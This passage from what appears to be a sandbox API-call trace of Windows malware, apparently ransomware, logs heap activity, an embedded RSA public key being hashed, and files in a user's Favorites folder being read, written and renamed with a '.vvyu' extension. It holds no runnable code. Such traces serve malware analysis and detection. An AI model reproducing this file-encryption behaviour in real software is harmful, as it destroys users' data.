hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0198.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3050 [0198.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0198.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3020 [0198.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3008 [0198.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3068 [0198.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0198.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3008 [0198.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0198.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0198.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0198.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0198.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fd8 [0198.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0198.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0198.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0198.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0198.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0198.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0198.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0198.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0198.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0198.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0198.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0198.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0198.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0198.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0198.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0198.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0198.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0198.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0198.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0198.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94f48 | out: hHeap=0x620000) returned 1 [0198.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0198.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0198.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0198.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0198.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0198.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0198.420] WriteFile (in: hFile=0x568, lpBuffer=0x2e91710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e91710*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0198.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0198.421] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.421] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0198.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0198.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0198.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.422] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0198.423] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.423] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.423] CloseHandle (hObject=0x568) returned 1 [0198.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0198.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.425] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Entertainment.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn entertainment.url.vvyu")) returned 1 [0198.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.426] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0198.429] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x799b81f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x799b81f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0198.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8e) returned 0x2e915e0 [0198.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.431] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Money.url") returned=".url" [0198.431] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0198.432] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0198.432] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0198.436] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.436] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0198.438] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.438] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.438] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.438] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0198.438] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.439] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0198.439] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.439] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0198.439] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0198.440] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0198.440] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0198.440] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0198.440] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0198.440] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0198.440] GetLastError () returned 0x0 [0198.440] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0198.440] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0198.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.441] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0198.441] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0198.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.441] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0198.441] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0198.441] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91710 [0198.441] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0198.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94f48 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fa8 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e94f00 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fc0 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ff0 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3050 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3008 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0198.442] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0198.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0198.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0198.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0198.442] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0198.443] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3050 [0198.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0198.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3008 [0198.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0198.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2ff0 [0198.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0198.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0198.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83b60 [0198.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0198.443] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0198.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0198.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0198.444] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0198.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0198.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ff0 | out: hHeap=0x620000) returned 1 [0198.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.444] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0198.445] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0198.446] GetCurrentThreadId () returned 0x66c [0198.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0198.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5bf0 [0198.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0198.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0198.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0198.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.446] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.446] GetCurrentThreadId () returned 0x66c [0198.446] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0198.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.447] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0198.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0198.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0198.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0198.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3050 [0198.448] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0198.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0198.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0198.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.448] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.449] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ff0 [0198.449] HeapFree (in: 